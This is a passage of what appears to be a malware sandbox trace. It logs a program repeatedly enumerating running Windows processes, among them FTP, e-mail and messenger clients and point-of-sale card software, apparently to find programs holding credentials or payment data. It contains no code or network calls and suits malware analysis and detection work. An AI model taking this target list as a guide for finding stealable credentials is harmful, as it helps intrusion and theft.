(in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0253.721] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0253.723] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0253.724] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0253.726] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0253.727] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0253.729] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0253.730] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0253.732] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0253.733] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0253.735] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0253.736] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0253.738] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0253.739] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0253.741] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0253.742] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0253.744] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0253.745] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0253.782] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0253.784] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0253.786] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0253.787] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0253.789] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0253.791] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0253.793] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0253.796] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0253.799] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0253.801] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0253.804] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0253.806] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0253.811] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0253.813] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0253.816] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0253.818] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0253.820] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0253.823] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0253.875] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0253.877] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0253.879] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0253.882] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0253.884] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0253.886] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0253.889] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0253.891] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0253.893] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0253.896] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0253.898] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0253.900] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0253.904] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0253.906] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0253.908] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0253.910] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0253.912] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0253.915] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0253.917] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0253.931] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0253.934] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0253.936] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0253.938] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0253.940] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0253.942] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0253.944] CloseHandle (hObject=0x17b0) returned 1 [0253.944] Sleep (dwMilliseconds=0x64) [0254.092] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0254.103] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.105] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0254.106] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0254.108] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.110] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0254.112] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.113] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0254.115] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0254.117] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0254.119] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.121] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.124] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0254.126] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.129] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.131] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.133] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.135] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.164] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.166] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.168] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0254.170] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0254.172] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, 